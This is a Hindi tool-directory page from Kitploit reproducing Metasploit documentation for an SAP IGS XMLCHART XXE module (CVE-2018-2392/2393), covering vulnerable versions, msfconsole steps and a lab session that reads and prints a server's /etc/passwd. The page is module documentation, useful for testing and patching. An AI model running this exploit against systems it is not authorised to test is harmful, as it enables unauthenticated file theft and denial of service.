Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
sap_igs_xxe — SAP IGS XXE हमला CVE-2018-2392 और CVE-2018-2393 | Kitploit
उपकरण/GitHubGitHub/vladimir-ivanov-git/sap_igs_xxe
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubvladimir-ivanov-git/sap_igs_xxe

sap_igs_xxe

SAP IGS XXE हमला CVE-2018-2392 और CVE-2018-2393

रिपॉजिटरी देखें
15 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SAP IGS XXE हमला CVE-2018-2392 और CVE-2018-2393

यह मॉड्यूल Metasploit Framework में

दस्तावेज़ीकरण

मॉड्यूल

असुरक्षित अनुप्रयोग

यह मॉड्यूल CVE-2018-2392 और CVE-2018-2393 का शोषण करता है, जो SAP Internet Graphics Servers (IGS) के XMLCHART पृष्ठ में दो XXE कमजोरियाँ हैं जो संस्करण 7.20, 7.20EXT, 7.45, 7.49 या 7.53 पर चल रहे हैं। ये कमजोरियाँ XMLCHART पृष्ठ पर नया चार्ट उत्पन्न करने के लिए POST अनुरोध सबमिट करते समय Extension HTML टैग पर उपयुक्त सत्यापन की कमी के कारण होती हैं।

सफल शोषण से अप्रमाणित रिमोट हमलावरों को IGS सेवा प्रारंभ होने वाले उपयोगकर्ता के रूप में सर्वर से फ़ाइलें पढ़ने की अनुमति मिलेगी, जो आमतौर पर SAP व्यवस्थापक उपयोगकर्ता होगा। वैकल्पिक रूप से हमलावर असुरक्षित SAP IGS सर्वर के विरुद्ध सेवा से वंचित (DoS) हमला करने के लिए XXE कमजोरी का दुरुपयोग भी कर सकते हैं।

अनुप्रयोग पृष्ठभूमि

Internet Graphics Service (IGS) एक बुनियादी ढाँचा प्रदान करता है जो डेवलपर्स को न्यूनतम प्रयास के साथ इंटरनेट ब्राउज़र में ग्राफ़िक्स प्रदर्शित करने में सक्षम बनाता है। इसे कई अलग-अलग SAP UI तकनीकों में एकीकृत किया गया है, जहाँ यह किसी अन्य SAP सिस्टम या डेटा स्रोत के डेटा का उपयोग गतिशील ग्राफिकल या गैर-ग्राफिकल आउटपुट उत्पन्न करने का एक तरीका प्रदान करता है।

स्थापना चरण

SAP IGS सर्वर को स्थापित और अद्यतन करने के चरण इस पृष्ठ पर ऑनलाइन पाए जा सकते हैं। IGS सर्वर कॉन्फ़िगर करने के बारे में अतिरिक्त जानकारी यहाँ मिल सकती है। अंत में, IGS सर्वर के प्रशासन के बारे में जानकारी यहाँ मिल सकती है।

सेट अप और कॉन्फ़िगर होने के बाद, इंस्टेंस डिफ़ॉल्ट HTTP पोर्ट 40080 पर असुरक्षित होंगे।

सत्यापन चरण

  1. msfconsole प्रारंभ करें
  2. करें: workspace [WORKSPACE]
  3. करें: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  4. करें: set RHOSTS [IP]
  5. करें: set FILE [remote file name]
  6. करें: set action READ
  7. करें: check
  8. सत्यापित करें कि check विधि सही ढंग से पहचानती है कि लक्ष्य असुरक्षित है या नहीं।
  9. करें: run
  10. सत्यापित करें कि आपके द्वारा निर्दिष्ट फ़ाइल की सामग्री वापस आ गई।

विकल्प

FILE

रिमोट सर्वर से पढ़ने के लिए फ़ाइल। उदाहरण: /etc/passwd

URIPATH

यह SAP IGS सर्वर के XMLCHART पृष्ठ का पथ है जो XXE के लिए असुरक्षित है। डिफ़ॉल्ट रूप से इसे /XMLCHART पर सेट किया गया है, हालाँकि इसे बदला जा सकता है यदि SAP IGS सर्वर को वेब रूट के अलावा किसी भिन्न पथ के अंतर्गत स्थापित किया गया हो। उदाहरण के लिए यदि SAP IGS सर्वर को वेब रूट के अंतर्गत /igs/ पथ पर स्थापित किया गया था, तो यह मान /igs/XMLCHART पर सेट होगा।

क्रियाएँ

root@kitploit:~
   नाम       विवरण
   ----      -----------
   READ      रिमोट फ़ाइल पढ़ना
   DOS       सेवा से वंचित करना

परिदृश्य

असुरक्षित SAP IGS रिलीज़: SUSE Linux Enterprise Server for SAP Applications 12 SP1 पर चल रहा 7.45

root@kitploit:~
msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt

Burp में HTTP जाँच अनुरोध

Burp में HTTP जाँच अनुरोध

Burp में रिमोट /etc/passwd फ़ाइल प्राप्त करने का पहला HTTP अनुरोध

Burp में रिमोट /etc/passwd फ़ाइल प्राप्त करने का पहला HTTP अनुरोध

Burp में रिमोट /etc/passwd फ़ाइल प्राप्त करने का दूसरा HTTP अनुरोध

Burp में रिमोट /etc/passwd फ़ाइल प्राप्त करने का दूसरा HTTP अनुरोध

डेमो वीडियो

डेमो वीडियो

टूल डाउनलोड करें